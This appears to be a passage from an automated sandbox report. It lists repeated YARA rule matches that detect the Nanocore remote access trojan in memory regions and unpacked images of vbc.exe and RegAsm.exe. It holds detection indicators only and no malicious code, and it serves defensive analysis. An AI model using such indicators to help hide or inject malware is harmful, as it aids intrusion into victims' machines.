          Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a44ddc.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e10000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.a50000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
